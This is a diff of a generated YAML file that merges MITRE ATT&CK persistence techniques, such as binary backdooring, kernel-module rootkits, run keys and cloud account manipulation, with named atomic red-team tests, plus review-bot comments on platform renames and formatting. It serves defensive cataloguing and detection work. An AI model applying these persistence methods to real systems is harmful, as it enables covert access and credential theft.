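Review bot: the platform `Azure AD` is replaced by `Identity Provider` for T1098.001 and two `Active Directory` data sources are added. Anything downstream that keys on the platform string (per-platform index files or filters) needs to be checked: confirm an `Identity Provider` view is generated and that any previously generated view for the old name is regenerated or removed, otherwise this technique silently drops out of the platform-specific outputs.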
@@ -65775,10 +66185,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -65787,10 +66205,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -65807,9 +66235,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests:
- name: Azure AD Application Hijacking - Service Principal
@@ -65990,7 +66415,7 @@ persistence:
name: sh
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -66065,7 +66490,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -66154,7 +66578,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests:
- name: Persistence via WMI Event Subscription - CommandLineEventConsumer
@@ -66292,19 +66715,23 @@ persistence:
name: powershell
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
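Review bot: the replaced description line carries the typo "persistence though modifications" (should be "through") in both the removed and the added version; since the text is upstream ATT&CK content it should be fixed upstream rather than patched in this generated file. Note also that the added paragraph now describes pinning a tampered binary with `yum-versionlock` / `versionlock.list`, while the `x_mitre_detection` text below is unchanged and still talks only about signing certificate metadata; monitoring changes to the versionlock file is the natural detection complement and could be proposed alongside this update.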
@@ -66318,7 +66745,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -66333,6 +66760,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
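Review bot: the `description` for the `Google Cloud Mandiant UNC3886 2024` reference starts with a stray leading space inside the double-quoted scalar (`" Punsaen Boonyakarn, ...`). If this is copied verbatim from upstream it will round-trip as-is, but if the generator post-processes reference strings it should strip leading whitespace so the entry matches the formatting of the neighbouring references.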
@@ -66346,11 +66778,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -66376,7 +66807,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -66390,7 +66820,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -66417,8 +66846,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -66429,7 +66858,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests:
- name: Change Default File Association
@@ -66499,7 +66929,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -66519,7 +66949,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests:
- name: Persistance with Event Monitor - emond
@@ -66546,7 +66975,7 @@ persistence:
elevation_required: true
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -66600,11 +67029,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -66691,9 +67119,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -66706,7 +67134,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests:
- name: Reg Key Run
@@ -67140,7 +67567,7 @@ persistence:
elevation_required: true
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -67153,9 +67580,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -67164,13 +67593,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
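Review bot: same platform-name migration as for T1098.001 above, but here `Azure AD`, `Office 365` and `Google Workspace` collapse into `Office Suite` and `Identity Provider` for T1136.003. Any output generated per platform needs the same check: the two new names must be produced and the three retired names either regenerated or dropped, since the technique no longer lists them.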
@@ -67218,9 +67647,6 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests:
- name: AWS - Create a new IAM user
@@ -67349,7 +67775,7 @@ persistence:
name: powershell
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -67385,16 +67811,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -67435,7 +67860,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: Admin Account Manipulate
@@ -68428,138 +68852,137 @@ persistence:
terraform apply -auto-approve
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
